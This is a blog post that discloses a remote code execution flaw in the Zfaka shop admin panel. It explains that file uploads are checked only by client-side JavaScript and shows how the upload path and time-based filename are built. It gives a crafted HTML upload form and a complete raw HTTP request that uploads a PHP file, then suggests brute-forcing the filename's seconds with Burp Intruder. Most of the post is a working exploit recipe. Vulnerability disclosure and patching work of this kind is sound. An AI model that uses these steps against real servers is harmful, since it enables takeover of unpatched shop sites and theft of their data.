Zfaka Backend RCE(All version)

in the background file upload, Zfaka only has one JS check in \public\res\layui\lay\modules\upload.js

there is no filtering for the file extension, and there is only one front-end JS verification, So disabling JS can directly implement the background rce

image-20210526205833957

The controller of upload in the background is located in \application\modules\Admin\controllers\Products.php

The upload path will not be returned after the file is uploaded, but we already know the upload path and the naming rules of the uploaded file

image-20210526204139761

UPLOAD_ Path is defined as follows


define('UPLOAD_PATH', APP_PATH.'/public/res/upload/');

CUR_ Date is defined as follows


define('CUR_DATE', date('Y-m-d'));

file name


$filename=date("His"); // Hour + minute + second

Taking 21:05 as an example, the output results are as follows

image-20210526210650296

Take 21:05:44 on May 26, 2021 as an example

The full file path is


http://www.xxx.com/res/upload/2021-05-26/210444.php

Construct form directly


<meta charset="utf-8">

<form action=" http://xxx.top/Admin/products/imgurlajax " method="post" enctype="multipart/form-data">

<label for="file">File:</label>

<input type="file" name="file" id="file" />

<input type="text" name="pid" id="pid" /> <--! Remember to modify the PID to the ID of the commodity (you can get it by selecting the commodity packet capture in the background) - > < / -! >

<input type="submit" value="Upload" />

</form>

At the same time, you need to add referers: http://xxx.top/Admin/products/imgurl/?id=1 , and modify the

Otherwise, "please select product ID" will be prompted

Finally, the complete upload HTTP request is as follows


POST http://xxx.top/Admin/products/imgurlajax HTTP/1.1

Host: xxxx

Content-Length: 291

Accept: application/json, text/javascript, */*; q=0.01

DNT: 1

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeSrhtSPGxub0H0eb

Origin: http://47.105.132.207

Referer: http://xxx.top/Admin/products/imgurl/?id=12

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh; q=0.9,en; q=0.8

Cookie: PHPSESSID=ql4ep5uk8cf9i0rvihrruuilaq

Connection: close



------WebKitFormBoundaryeSrhtSPGxub0H0eb

Content-Disposition: form-data; name="file"; filename="test.php"

Content-Type: image/png



<? php

phpinfo();

------WebKitFormBoundaryeSrhtSPGxub0H0eb

Content-Disposition: form-data; name="pid"



12

------WebKitFormBoundaryeSrhtSPGxub0H0eb--

Direct upload succeeded

Then run the last seconds with burpsuite intruder

After all, the number of seconds can't be so accurate

image-20210526212753095

image-20210526233749316

posted @ 2022-01-31 11:17  J0o1ey  阅读(370)  评论(0编辑  收藏  举报